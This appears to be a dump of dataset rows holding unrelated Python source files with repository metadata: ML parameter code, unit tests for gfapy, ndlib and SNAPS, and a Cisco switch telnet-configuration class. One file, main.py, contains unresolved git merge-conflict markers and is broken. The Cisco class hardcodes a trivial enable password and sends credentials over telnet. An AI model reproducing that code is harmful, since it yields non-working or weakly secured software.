head_label_aggregation = hparams.head_label_aggregation
else:
head_label_aggregation = param_values["head_label_aggregation"]
head_gen_fn = partial(head_gen_fn, head_label_aggregation=head_label_aggregation)
if "label_score_multiplier" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "label_score_multiplier" in param_values:
multiplier = hparams.label_score_multiplier
else:
multiplier = param_values["label_score_multiplier"]
head_gen_fn = partial(head_gen_fn, ls_multiplier=multiplier)
if "label_score_aggregation" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "label_score_aggregation" in param_values:
label_score_aggregation = hparams.label_score_aggregation
else:
label_score_aggregation = param_values["label_score_aggregation"]
head_gen_fn = partial(head_gen_fn, label_score_aggregation=label_score_aggregation)
if "use_strength_bias" in param_values or hparams.use_labeled_adjacency_mtx_hparams_option:
if not "use_strength_bias" in param_values:
use_strength_bias = hparams.use_strength_bias
else:
use_strength_bias = param_values["use_strength_bias"]
head_gen_fn = partial(head_gen_fn, use_strength_bias=use_strength_bias)
if "head_dropout_rate" in param_values or hparams.use_hparams_head_dropout_option:
transformation_param['head_dropout'] = True
if not "head_dropout_rate" in param_values:
dropout = hparams.head_dropout_rate
else:
dropout = param_values['head_dropout_rate']
transformation_param['head_dropout_rate'] = dropout
if "head_replacing" in param_values or hparams.use_hparams_head_replacing_option:
transformation_param['head_replacing'] = True
if not "head_replacing" in param_values:
rate = hparams.head_dropout
else:
rate = param_values['head_replacing_rate']
transformation_param['head_replacing_rate'] = rate
if "label_replacing" in param_values or hparams.use_hparams_label_replacing_option:
transformation_param['label_replacing'] = True
if not "label_replacing" in param_values:
rate = hparams.label_dropout
else:
rate = param_values['label_replacing_rate']
transformation_param['label_replacing_rate'] = rate
if "on_prob" in param_values or hparams.use_hparams_on_prob_option:
if not "on_prob" in param_values:
rate = hparams.on_prob
else:
rate = param_values['on_prob']
transformation_param['on_prob'] = rate
if "prod_mode" in param_values or hparams.use_hparams_prod_mode_option:
if not "prod_mode" in param_values:
mode = hparams.prod_mode
else:
mode = param_values["prod_mode"]
transformation_param['prod_mode'] = mode
transformation_param['new_masking'] = hparams.new_masking
transformation_param['extreme_value'] = hparams.extreme_value
transformation_param['head_gen_fn_train'] = head_gen_fn
transformation_param['head_gen_fn_eval'] = head_gen_fn
elif transformation_fn_name.startswith('get_hsdp_labeled_adjacent_mtx'):
func_name = transformation_fn_name[:29]
transformation_param['chain'] = transformation_fn_name.split('_')[5:]
if hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 39
elif not hparams.is_ud and hparams.conll05:
transformation_param['num_labels'] = 44
elif not hparams.is_ud and not hparams.conll05:
transformation_param['num_labels'] = 45
else:
tf.logging.log("unknown dataset format")
raise ValueError
if hparams.relchain_softmax_smoothing:
transformation_param['smoothing_softmax'] = True
elif transformation_fn_name.startswith('get_adjacent_mtx') and hparams.transformation_fn_norm == "none" and hparams.using_log_prob == True:
func_name = "get_adjacent_mtx_nonenorm_logprob"
transformation_param['chain'] = transformation_fn_name.split('_')[3:]
elif transformation_fn_name.startswith('get_adjacent_mtx'):
func_name = transformation_fn_name[:16]
transformation_param['chain'] = transformation_fn_name.split('_')[3:]
else:
func_name = transformation_fn_name
if 'allow_intermediate_nodes' in param_values:
transformation_param['allow_intermediate_nodes'] = param_values['allow_intermediate_nodes']
tf.logging.log(tf.logging.INFO, "Using {} transformation function".format(func_name))
output = transformation_fn.dispatch(func_name)(**transformation_param)
print("transformed_output:", output)
outputs += [output]
# params[param_name] = tf.expand_dims(output, 1)
else:
tf.logging.log(tf.logging.ERROR, "no transformation function specified")
raise NotImplementedError
else:
tf.logging.log(tf.logging.ERROR, "output entry must be a dict")
raise NotImplementedError
params[param_name] = tf.stack(outputs, axis=1)
# params['parser_dropout'] = hparams.parser_dropout
if hparams.aggregator_mlp_bn:
params['batch_norm'] = True
elif 'feature' in param_values:
if isinstance(param_values['feature'], dict):
attn_constraints = []
for src, transformation_name in param_values['feature'].items():
attn_map = transformation_fn.dispatch(transformation_name)(
**transformation_fn.get_params(features[src], transformation_name, src, tokens_to_keep))
attn_constraints += [attn_map]
params[param_name] = tf.stack(attn_constraints, axis=1)
elif isinstance(param_values['feature'], list): # only for compatability reason
params[param_name] = tf.stack([features[src] for src in param_values['feature']], axis=1)
elif isinstance(param_values['feature'], str): # only for compatability reason
params[param_name] = features[param_values['label']]
else:
print('Undefined attention source format')
raise NotImplementedError
# todo sentence feature may be invoked by non-aggregation attentions
params['parser_dropout'] = hparams.parser_dropout
if hparams.aggregator_mlp_bn:
params['batch_norm'] = True
if 'sentence_feature' in param_values:
params['mlp_dropout'] = hparams.mlp_dropout
params['projection_dim'] = model_config['linear_aggregation_scorer_mlp_size']
params['v'] = features['sentence_feature']
elif 'layer' in param_values:
outputs_layer = train_outputs[param_values['layer']]
params[param_name] = outputs_layer[param_values['output']]
else:
params[param_name] = param_values['value']
# print("debug <attention fn parameters>: ", params)
return params
| 56.580508 | 177 | 0.67468 | 3,109 | 26,706 | 5.418784 | 0.080733 | 0.060723 | 0.042441 | 0.014958 | 0.802576 | 0.789043 | 0.779842 | 0.752656 | 0.743278 | 0.733128 | 0 | 0.007498 | 0.245937 | 26,706 | 471 | 178 | 56.700637 | 0.829079 | 0.062121 | 0 | 0.70024 | 0 | 0 | 0.144182 | 0.041024 | 0 | 0 | 0 | 0.002123 | 0 | 1 | 0.021583 | false | 0.004796 | 0.01199 | 0 | 0.055156 | 0.016787 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fee1ca02ba8d9adc3baf56f5395bf6a91d5dd095 | 2,121 | py | Python | tests/test_unit_multiplication.py | ujjwalsh/gfapy | 891ef3df695f20c67809e5a54549c876d90690b4 | [
"ISC"
] | 44 | 2017-03-18T08:08:04.000Z | 2021-11-10T16:11:15.000Z | tests/test_unit_multiplication.py | ujjwalsh/gfapy | 891ef3df695f20c67809e5a54549c876d90690b4 | [
"ISC"
] | 22 | 2017-04-04T21:20:31.000Z | 2022-03-09T19:05:30.000Z | tests/test_unit_multiplication.py | ujjwalsh/gfapy | 891ef3df695f20c67809e5a54549c876d90690b4 | [
"ISC"
] | 5 | 2017-07-07T02:56:56.000Z | 2020-09-30T20:10:49.000Z | import gfapy
import unittest
class TestUnitMultiplication(unittest.TestCase):
def test_auto_select_distribute_end_lB_eq_lE(self):
g = gfapy.Gfa()
# lB == lE == 1
self.assertEqual(None, g._auto_select_distribute_end( 4, 1, 1, False))
# lB == lE == factor
self.assertEqual("R", g._auto_select_distribute_end( 4, 4, 4, False))
# lB == lE; </> factor
self.assertEqual("R", g._auto_select_distribute_end( 4, 2, 2, False))
self.assertEqual("L", g._auto_select_distribute_end( 4, 6, 6, False))
def test_auto_select_distribute_end_l_1(self):
g = gfapy.Gfa()
# lB or lE == 1, other </==/> factor
self.assertEqual("L", g._auto_select_distribute_end( 4, 2, 1, False))
self.assertEqual("L", g._auto_select_distribute_end( 4, 4, 1, False))
self.assertEqual("L", g._auto_select_distribute_end( 4, 6, 1, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 1, 2, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 1, 4, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 1, 6, False))
def test_auto_select_distribute_end_eq_factor(self):
g = gfapy.Gfa()
# one =, one > factor
self.assertEqual("L", g._auto_select_distribute_end( 4, 4, 5, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 5, 4, False))
# one =, one < factor
self.assertEqual("L", g._auto_select_distribute_end( 4, 4, 3, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 3, 4, False))
def test_auto_select_distribute_end_diff_factor(self):
g = gfapy.Gfa()
# both > 1; both < factor
self.assertEqual("L", g._auto_select_distribute_end( 4, 3, 2, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 2, 3, False))
# both > 1; both > factor
self.assertEqual("L", g._auto_select_distribute_end( 4, 5, 6, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 6, 5, False))
# both > 1; one <, one > factor
self.assertEqual("L", g._auto_select_distribute_end( 4, 3, 5, False))
self.assertEqual("R", g._auto_select_distribute_end( 4, 5, 3, False))
| 45.12766 | 74 | 0.682697 | 331 | 2,121 | 4.057402 | 0.10574 | 0.178704 | 0.357409 | 0.41102 | 0.887565 | 0.836932 | 0.814594 | 0.76545 | 0.711839 | 0.711839 | 0 | 0.037351 | 0.166902 | 2,121 | 46 | 75 | 46.108696 | 0.722694 | 0.097124 | 0 | 0.129032 | 0 | 0 | 0.009979 | 0 | 0 | 0 | 0 | 0 | 0.645161 | 1 | 0.129032 | false | 0 | 0.064516 | 0 | 0.225806 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
3a22ec988af6db086bfa8ce2e1b9e133d569a06f | 38 | py | Python | contributed/__init__.py | hessammehr/agpy | a9436f8e5b9210ef8a86d03d0fd94f2d4e6212db | [
"MIT"
] | 16 | 2015-05-08T11:14:26.000Z | 2021-11-19T19:05:16.000Z | contributed/__init__.py | hessammehr/agpy | a9436f8e5b9210ef8a86d03d0fd94f2d4e6212db | [
"MIT"
] | 3 | 2016-05-12T16:27:14.000Z | 2020-12-27T01:14:24.000Z | contributed/__init__.py | hessammehr/agpy | a9436f8e5b9210ef8a86d03d0fd94f2d4e6212db | [
"MIT"
] | 19 | 2015-03-30T22:34:14.000Z | 2020-11-25T23:29:53.000Z | from parallel_map import parallel_map
| 19 | 37 | 0.894737 | 6 | 38 | 5.333333 | 0.666667 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3a4c45c32603e479cdae302525ea082e452ee8e0 | 160 | py | Python | inpainting.py | ionaic/cvvfx-fly-away | efbc128c4bfa49bdb23ce2f03f1d8c79348fa248 | [
"AAL"
] | null | null | null | inpainting.py | ionaic/cvvfx-fly-away | efbc128c4bfa49bdb23ce2f03f1d8c79348fa248 | [
"AAL"
] | null | null | null | inpainting.py | ionaic/cvvfx-fly-away | efbc128c4bfa49bdb23ce2f03f1d8c79348fa248 | [
"AAL"
] | null | null | null | import numpy, cv2
#def maskReformat(mask):
def fromMask(img, mask, radius=50, intype=cv2.INPAINT_NS):
return cv2.inpaint(img, mask, radius, intype)
| 22.857143 | 59 | 0.70625 | 23 | 160 | 4.869565 | 0.608696 | 0.125 | 0.232143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037594 | 0.16875 | 160 | 6 | 60 | 26.666667 | 0.804511 | 0.14375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
e91766496092355f3ebfc850b2c411de1d346d9d | 353 | py | Python | main.py | kuvbur/pyrwin | c5422cd2d27aab78c69a1ef1f3e95b228fdd9024 | [
"MIT"
] | 1 | 2016-11-18T11:46:49.000Z | 2016-11-18T11:46:49.000Z | main.py | kuvbur/pyrwin | c5422cd2d27aab78c69a1ef1f3e95b228fdd9024 | [
"MIT"
] | null | null | null | main.py | kuvbur/pyrwin | c5422cd2d27aab78c69a1ef1f3e95b228fdd9024 | [
"MIT"
] | null | null | null | <<<<<<< HEAD
# -*- coding: utf-8 -*-
import asyncio
import dialog
import skype
def choice(type_m, author, skypeid, isgroup, text):
=======
# -*- coding: utf-8 -*-
import asyncio
import dialog
import skype
def choice(type_m, author, skypeid, isgroup, text):
>>>>>>> origin/master
asyncio.ensure_future(skype.send_text(dialog.get_speech(), skypeid)) | 22.0625 | 72 | 0.688385 | 47 | 353 | 5.06383 | 0.489362 | 0.07563 | 0.084034 | 0.134454 | 0.705882 | 0.705882 | 0.705882 | 0.705882 | 0.705882 | 0.705882 | 0 | 0.006515 | 0.130312 | 353 | 16 | 72 | 22.0625 | 0.76873 | 0.121813 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
e93c4468ebce30e3c5934ec450135e3c780868d6 | 6,639 | py | Python | ndlib/test/test_parser.py | vahidmoeinifar/ndlib | c55a65b4f0ed2928cf36f4e2b33d872d33e734ba | [
"BSD-2-Clause"
] | 6 | 2018-12-20T07:33:09.000Z | 2020-05-10T07:33:33.000Z | ndlib/test/test_parser.py | vahidmoeinifar/ndlib | c55a65b4f0ed2928cf36f4e2b33d872d33e734ba | [
"BSD-2-Clause"
] | null | null | null | ndlib/test/test_parser.py | vahidmoeinifar/ndlib | c55a65b4f0ed2928cf36f4e2b33d872d33e734ba | [
"BSD-2-Clause"
] | 2 | 2020-02-05T09:11:17.000Z | 2020-02-07T11:12:33.000Z | from __future__ import absolute_import
import unittest
import ndlib.parser.ExperimentParser as ep
import networkx as nx
import os
__author__ = 'Giulio Rossetti'
__license__ = "BSD-2-Clause"
__email__ = "giulio.rossetti@gmail.com"
class NdlibParserTest(unittest.TestCase):
def test_node_stochastic(self):
query = "CREATE_NETWORK g1\n" \
"TYPE erdos_renyi_graph\n" \
"PARAM n 300\n" \
"PARAM p 0.1\n" \
"\n" \
"MODEL model1\n" \
"\n" \
"STATUS Susceptible\n" \
"\n" \
"STATUS Infected\n" \
"\n" \
"STATUS Removed\n" \
"\n" \
"COMPARTMENT c1\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c2\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"COMPOSE c1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c3\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"\n" \
"RULE\n" \
"FROM Susceptible\n" \
"TO Infected\n" \
"USING c2\n" \
"\n" \
"RULE\n" \
"FROM Infected\n" \
"TO Removed\n" \
"USING c3\n" \
"\n" \
"INITIALIZE\n" \
"SET Infected 0.1\n" \
"\n" \
"EXECUTE model1 ON g1 FOR 100"
parser = ep.ExperimentParser()
parser.set_query(query)
parser.parse()
iterations = parser.execute_query()
self.assertIn('trends', iterations[0])
def test_ifcompose(self):
query = "CREATE_NETWORK g1\n" \
"TYPE erdos_renyi_graph\n" \
"PARAM n 300\n" \
"PARAM p 0.1\n" \
"\n" \
"MODEL model1\n" \
"\n" \
"STATUS Susceptible\n" \
"\n" \
"STATUS Infected\n" \
"\n" \
"STATUS Removed\n" \
"\n" \
"COMPARTMENT c1\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c2\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c3\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"\n" \
"IF c1 THEN c2 ELSE c3 AS r1\n" \
"\n" \
"RULE\n" \
"FROM Infected\n" \
"TO Removed\n" \
"USING r1\n" \
"\n" \
"INITIALIZE\n" \
"SET Infected 0.1\n" \
"\n" \
"EXECUTE model1 ON g1 FOR 100"
parser = ep.ExperimentParser()
parser.set_query(query)
parser.parse()
iterations = parser.execute_query()
self.assertIn('trends', iterations[0])
def test_net_load(self):
base = os.path.dirname(os.path.abspath(__file__))
g = nx.karate_club_graph()
fname = "%s/edge.txt" % base
nx.write_edgelist(g, fname)
query = "LOAD_NETWORK g1 FROM %s\n" \
"\n" \
"MODEL model1\n" \
"\n" \
"STATUS Susceptible\n" \
"\n" \
"STATUS Infected\n" \
"\n" \
"STATUS Removed\n" \
"\n" \
"COMPARTMENT c1\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c2\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"COMPOSE c1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c3\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"\n" \
"RULE\n" \
"FROM Susceptible\n" \
"TO Infected\n" \
"USING c2\n" \
"\n" \
"RULE\n" \
"FROM Infected\n" \
"TO Removed\n" \
"USING c3\n" \
"\n" \
"INITIALIZE\n" \
"SET Infected 0.1\n" \
"\n" \
"EXECUTE model1 ON g1 FOR 10" % fname
parser = ep.ExperimentParser()
parser.set_query(query)
parser.parse()
iterations = parser.execute_query()
try:
os.remove("%s/edge.txt" % base)
except OSError:
pass
self.assertIn('trends', iterations[0])
def test_node_countdown(self):
query = "CREATE_NETWORK g1\n" \
"TYPE erdos_renyi_graph\n" \
"PARAM n 300\n" \
"PARAM p 0.1\n" \
"\n" \
"MODEL model1\n" \
"\n" \
"STATUS Susceptible\n" \
"\n" \
"STATUS Infected\n" \
"\n" \
"STATUS Removed\n" \
"STATUS Wait\n" \
"\n" \
"COMPARTMENT c1\n" \
"TYPE NodeStochastic\n" \
"PARAM rate 0.1\n" \
"TRIGGER Infected\n" \
"\n" \
"COMPARTMENT c2\n" \
"TYPE CountDown\n" \
"PARAM iterations 5\n" \
"PARAM name time\n" \
"\n" \
"RULE\n" \
"FROM Susceptible\n" \
"TO Infected\n" \
"USING c1\n" \
"\n" \
"RULE\n" \
"FROM Infected\n" \
"TO Removed\n" \
"USING c2\n" \
"\n" \
"INITIALIZE\n" \
"SET Infected 0.1\n" \
"\n" \
"EXECUTE model1 ON g1 FOR 100"
parser = ep.ExperimentParser()
parser.set_query(query)
parser.parse()
iterations = parser.execute_query()
self.assertIn('trends', iterations[0])
| 31.023364 | 57 | 0.381533 | 607 | 6,639 | 4.092257 | 0.171334 | 0.034622 | 0.020531 | 0.016103 | 0.800725 | 0.799919 | 0.799919 | 0.785427 | 0.785427 | 0.785427 | 0 | 0.030021 | 0.498268 | 6,639 | 213 | 58 | 31.169014 | 0.715701 | 0 | 0 | 0.848485 | 0 | 0 | 0.304112 | 0.003766 | 0 | 0 | 0 | 0 | 0.020202 | 1 | 0.020202 | false | 0.005051 | 0.025253 | 0 | 0.050505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3af5865b411c5a7a9e24401d369b5b4b0551ec61 | 6,006 | py | Python | fnat_testset/testlib/cisco3560.py | lizhouw-netscout/fnat | 684958773379a9205857f1932de443ed0c4334a0 | [
"Apache-2.0"
] | null | null | null | fnat_testset/testlib/cisco3560.py | lizhouw-netscout/fnat | 684958773379a9205857f1932de443ed0c4334a0 | [
"Apache-2.0"
] | null | null | null | fnat_testset/testlib/cisco3560.py | lizhouw-netscout/fnat | 684958773379a9205857f1932de443ed0c4334a0 | [
"Apache-2.0"
] | null | null | null | import pexpect
class Cisco3560:
def __init__(self,str_host,str_user,str_passwd):
self.ipaddr=str_host
self.username=str_user
self.passwd=str_passwd
self.administrator = '123'
print('Cisco3560')
def set_speed_duplex_value(self,port,speed,duplex):
##speed:10,100,1000,auto##
##duplex:auto,full,half##
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('int giga %s' % port)
child.expect('if')
child.sendline('speed %s' % speed)
child.sendline('duplex %s' % duplex)
child.sendline('exit')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_poe_enable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('int giga %s' % port)
child.expect('if')
child.sendline('power inline auto')
child.sendline('exit')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_poe_disable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('int giga %s' % port)
child.expect('if')
child.sendline('power inline never')
child.sendline('exit')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_lldp_disable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('no lldp run')
child.sendline('no cdp run')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_lldp_enable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('lldp run')
child.sendline('no cdp run')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_cdp_enable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('no lldp run')
child.sendline('cdp run')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_lldp_cdp_enable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("Username:")
if ( index == 0 ):
child.sendline(self.username)
child.expect('Password:')
child.sendline(self.passwd)
child.expect('>')
child.sendline('enable')
child.expect('Password:')
child.sendline(self.administrator)
child.expect('#')
child.sendline('conf t')
child.expect('config')
child.sendline('lldp run')
child.sendline('cdp run')
child.sendline('exit')
child.sendline('exit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
| 33.553073 | 65 | 0.562105 | 653 | 6,006 | 5.130168 | 0.099541 | 0.26 | 0.106567 | 0.100299 | 0.918507 | 0.918507 | 0.918507 | 0.918507 | 0.918507 | 0.918507 | 0 | 0.009727 | 0.298202 | 6,006 | 178 | 66 | 33.741573 | 0.785053 | 0.00716 | 0 | 0.882716 | 0 | 0 | 0.156003 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049383 | false | 0.141975 | 0.006173 | 0 | 0.061728 | 0.049383 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
c93c2226c679655457d053220b11d6bf6d4bb4f2 | 196 | py | Python | Round 1/1.HelloWorld/run.py | beetlesoup/udemy-python-scripting-a-car | ae41491161821a8f4e63fc86c368a71bb3d6cc15 | [
"Unlicense"
] | null | null | null | Round 1/1.HelloWorld/run.py | beetlesoup/udemy-python-scripting-a-car | ae41491161821a8f4e63fc86c368a71bb3d6cc15 | [
"Unlicense"
] | null | null | null | Round 1/1.HelloWorld/run.py | beetlesoup/udemy-python-scripting-a-car | ae41491161821a8f4e63fc86c368a71bb3d6cc15 | [
"Unlicense"
] | null | null | null | ######################
# Start Learning Here
######################
print("I just updated my first Python program!")
#######################
# End Learning Here
#######################
| 19.6 | 49 | 0.352041 | 14 | 196 | 4.928571 | 0.857143 | 0.347826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153061 | 196 | 9 | 50 | 21.777778 | 0.415663 | 0.188776 | 0 | 0 | 0 | 0 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
a3760445f995105e3fc5387e227bffc9d0221f8c | 10,283 | py | Python | functest/tests/unit/openstack/snaps/test_snaps.py | boucherv/functest | 9b1975bde268c3f1347e62022e9c639f4248af97 | [
"Apache-2.0"
] | null | null | null | functest/tests/unit/openstack/snaps/test_snaps.py | boucherv/functest | 9b1975bde268c3f1347e62022e9c639f4248af97 | [
"Apache-2.0"
] | null | null | null | functest/tests/unit/openstack/snaps/test_snaps.py | boucherv/functest | 9b1975bde268c3f1347e62022e9c639f4248af97 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2017 Cable Television Laboratories, Inc. and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
#
# http://www.apache.org/licenses/LICENSE-2.0
# pylint: disable=missing-docstring
import logging
import unittest
import mock
from snaps.openstack.os_credentials import OSCreds
from xtesting.core import testcase
from functest.opnfv_tests.openstack.snaps import api_check
from functest.opnfv_tests.openstack.snaps import health_check
from functest.opnfv_tests.openstack.snaps import smoke
class APICheckTesting(unittest.TestCase):
"""
Ensures the VPingUserdata class can run in Functest. This test does not
actually connect with an OpenStack pod.
"""
def setUp(self):
self.os_creds = OSCreds(
username='user', password='pass',
auth_url='http://foo.com:5000/v3', project_name='bar')
self.api_check = api_check.ApiCheck(
os_creds=self.os_creds, ext_net_name='foo')
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_client_tests')
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_api_tests')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_success(self, *args):
args[0].return_value.testsRun = 100
args[0].return_value.failures = []
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.api_check.run())
self.assertEquals(
testcase.TestCase.EX_OK, self.api_check.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
ext_net_name='foo', image_metadata=mock.ANY,
os_creds=self.os_creds, suite=mock.ANY, use_keystone=True)
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_client_tests')
@mock.patch('functest.opnfv_tests.openstack.snaps.snaps_suite_builder.'
'add_openstack_api_tests')
@mock.patch('unittest.TextTestRunner.run',
return_value=mock.MagicMock(name='unittest.TextTestResult'))
def test_run_1_of_100_ko(self, *args):
args[0].return_value.testsRun = 100
args[0].return_value.failures = ['foo']
args[0].return_value.errors = []
self.assertEquals(testcase.TestCase.EX_OK, self.api_check.run())
self.assertEquals(
testcase.TestCase.EX_TESTCASE_FAILED,
self.api_check.is_successful())
args[0].assert_called_with(mock.ANY)
args[1].assert_called_with(
ext_net_name='foo', image_metadata=mock.ANY,
os_creds=self.os_creds, suite=mock.ANY, use_keystone=True)
